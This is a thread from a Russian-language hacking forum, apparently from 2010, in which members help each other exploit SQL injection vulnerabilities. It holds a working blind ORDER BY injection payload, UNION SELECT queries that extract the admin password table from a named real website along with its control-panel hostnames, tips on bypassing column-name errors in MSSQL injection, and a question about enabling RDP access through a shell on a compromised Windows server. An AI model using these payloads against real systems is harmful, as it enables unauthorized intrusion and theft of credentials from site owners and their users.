 |
|
10.10.2010, 18:40
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами:
9000386
Репутация:
1148
|
|
Сообщение от Malygos
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]SELECT username FROM users ORDER BY username[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]URL[/COLOR][COLOR="#007700"]][/COLOR][/COLOR]
Is it possible to inject this? I know it is not possible to do union all select.
site.php?orderby=ASC gives ascending and orderby=DESC gives descending.
site.php?orderby=,password gives same as ASC
site.php?orderby=limit 0,1 gives only first username.
site.php?orderby=ASC, 1 gives true (everything ok on site)
site.php?orderby=ASC, 0 gives false (content missing)
orderby=ASC, 1=2 gives true (wtf?)
Any help or way to inject this? Sorry for not speaking Russian! Example, we have mysql5.
Сообщение от None
select username from users order by username
*(IF(ASCII(SUBSTRING(VERSION(),1,1))=53,1,-1))
1 user
2 user
3 user
4 user
select username from users order by username
*(IF(ASCII(SUBSTRING(VERSION(),1,1))=52,1,-1))
4 user
3 user
2 user
1 user
Код:
Exploit:
site.php?orderby=%2A%28IF%28ASCII%28SUBSTRING%28VERSION%28%29%2C1%2C1%29%29%3D53%2C1%2C-1%29%29%0D%0A -> true
site.php?orderby=%2A%28IF%28ASCII%28SUBSTRING%28VERSION%28%29%2C1%2C1%29%29%3D52%2C1%2C-1%29%29 -> false
|
|
|
10.10.2010, 19:47
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами:
9100556
Репутация:
912
|
|
есть шелл на вин сервере. как черед смд сделать, чтобы можно было подключится по rdp?
|
|
|
|
10.10.2010, 19:58
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами:
9000386
Репутация:
1148
|
|
Сообщение от .:[melkiy
:."]
.:[melkiy]:. said:
есть шелл на вин сервере. как черед смд сделать, чтобы можно было подключится по rdp?
в консоли команды прописываеш, а потом mstsc.
|
|
|
|
10.10.2010, 20:40
|
|
Познающий
Регистрация: 24.09.2010
Сообщений: 84
С нами:
8227766
Репутация:
0
|
|
Помогите раскрутить найденную уязвимость=)
http://www.thegotomom.com/blog-post.php?id=118%20and%201=0%20union%20select%20666 1,%28select%20group_concat%28column_name%29%20from %20information_schema.columns%20where%20table_name %20=%200x61646d696e5f74626c%29,6663,6664,6665%20fr om%20admin_tbl--+
админку найте не могу...
//здесь не помогают ломать =\ а помогают раскрутить найденную уязвимость
|
|
|
|
10.10.2010, 21:16
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
С нами:
9061916
Репутация:
0
|
|
Сообщение от S-J
Помогите раскрутить найденную уязвимость=)
http://www.thegotomom.com/blog-post.php?id=-118+union+select+1,password,3,4,5+from+admin_tbl
|
|
|
|
10.10.2010, 21:33
|
|
Познающий
Регистрация: 24.09.2010
Сообщений: 84
С нами:
8227766
Репутация:
0
|
|
Сообщение от d1v
http://www.thegotomom.com/blog-post.php?id=-118+union+select+1,password,3,4,5+from+admin_tbl
Спасибо ещё бы админку)
|
|
|
|
10.10.2010, 23:26
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
С нами:
9361870
Репутация:
58
|
|
есть mssql inj
структура таблицы:
Сообщение от None
[Allmembers
ostCode]
[Allmembers:Telephone]
[Allmembers:EnquiryDate]
[Allmembers:GenderCode]
[Allmembers:LastMailShotDate]
[Allmembers:StatusID]
[Allmembers:ContactMeans]
[Allmembers:County]
[Allmembers:BoxNo]
[Allmembers:E-mail]
[Allmembers:showemail]
[Allmembers:NickName]
[Allmembers
ateOfBirth]
не получается вывести инфо из нее - на все запросы выдает:
Invalid column name 'E-mail'.
как обойти?
и еще вопрос - как узнать количество записеи в табле? |
|
|
|
11.10.2010, 00:31
|
|
Новичок
Регистрация: 04.11.2009
Сообщений: 4
С нами:
8693835
Репутация:
0
|
|
Сообщение от S-J
Спасибо ещё бы админку)
cpanel.thegotomom.com
webdisk.thegotomom.com
|
|
|
|
11.10.2010, 00:49
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
С нами:
9147012
Репутация:
9
|
|
Сообщение от j0ker13
есть mssql inj
структура таблицы:
не получается вывести инфо из нее - на все запросы выдает:
Invalid column name 'E-mail'.
как обойти?
и еще вопрос - как узнать количество записеи в табле?
Шифруй слово "email" в HEX или CHAR
|
|
|
|
11.10.2010, 10:58
|
|
Участник форума
Регистрация: 17.04.2010
Сообщений: 221
С нами:
8456912
Репутация:
17
|
|
Сообщение от Gemini12
Шифруй слово "email" в HEX или CHAR
Вот скажи мне, зачем?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?2380780){kind=avatar}
Похожие темы
Линейный вид
